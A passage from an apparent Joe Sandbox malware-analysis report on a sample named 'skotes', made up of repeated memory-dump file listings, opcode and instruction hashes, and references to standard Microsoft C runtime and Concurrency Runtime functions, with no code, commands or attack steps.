                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1256429809-0
                                                                                                                                                                                                                                                                • Opcode ID: a8f038b87c9cdc4ca582c019455607a253a3d83922993cb55c117172802063c9
                                                                                                                                                                                                                                                                • Instruction ID: 1a0fbf60533cd6fc5c60003e6b87fbac1d96b7fac9cb7935076bf9fbe743b9e7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8f038b87c9cdc4ca582c019455607a253a3d83922993cb55c117172802063c9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2871AA70900249AFDF15CF64C991BBEBBB2EF65344F04409AEC426B362C7729D16DB61
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00AC2876
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00AC28DF
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00AC2913
                                                                                                                                                                                                                                                                  • Part of subcall function 00AC07ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 00AC080D
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00AC2993
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00AC29DB
                                                                                                                                                                                                                                                                  • Part of subcall function 00AC07C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00AC07DE
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00AC29EF
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00AC2A00
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00AC2A4D
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00AC2A7E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1321587334-0
                                                                                                                                                                                                                                                                • Opcode ID: 9fae9857df5949f30b798cf7b56ec1967c5c00e1576d577b0c67b504894f8510
                                                                                                                                                                                                                                                                • Instruction ID: 08b5dacc98e5d1155eb2a74fe4db57d7f43514f2825711bdaea787ec4e4c75ed
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9fae9857df5949f30b798cf7b56ec1967c5c00e1576d577b0c67b504894f8510
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2381AC31A0061ADFCF28DFA9D990FAEBBB1BB68300B66402DD445E7651DB30AD41CF94
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00AC6A1F
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00AC6A51
                                                                                                                                                                                                                                                                • List.LIBCONCRT ref: 00AC6A8C
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00AC6A9D
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00AC6AB9
                                                                                                                                                                                                                                                                • List.LIBCONCRT ref: 00AC6AF4
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00AC6B05
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00AC6B20
                                                                                                                                                                                                                                                                • List.LIBCONCRT ref: 00AC6B5B
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00AC6B68
                                                                                                                                                                                                                                                                  • Part of subcall function 00AC5EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00AC5EF7
                                                                                                                                                                                                                                                                  • Part of subcall function 00AC5EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00AC5F09
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3403738998-0
                                                                                                                                                                                                                                                                • Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                                                                                                                                                • Instruction ID: d19b8bbb233a6276b2bb854ff832ea6800b31495d2b7eefe889374739fb734d4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC512C75A00209AFDB08DF64C595FEDB7B8BF08344F1640ADE915AB282DB30EE45CB90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 00AD53A0
                                                                                                                                                                                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 00AD53C7
                                                                                                                                                                                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 00AD54D3
                                                                                                                                                                                                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 00AD55AE
                                                                                                                                                                                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 00AD5650
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                • API String ID: 4162181273-393685449
                                                                                                                                                                                                                                                                • Opcode ID: 6ed53321f6b283fa3e8f289a9cf850b3d50c60b1adfd2a81dfa6e72080286f23
                                                                                                                                                                                                                                                                • Instruction ID: 83cf2d4447a28b439ed6b539222192c1c10aa006bba287102f2fe422b6254595
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ed53321f6b283fa3e8f289a9cf850b3d50c60b1adfd2a81dfa6e72080286f23
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52C17871C00A09EFCF2ADFA4D9809AEBBB5BF18311F14415BE816AB312D771DA51CB91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00AC73B0
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00AC73F2
                                                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 00AC740E
                                                                                                                                                                                                                                                                • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00AC7419
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AC7440
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
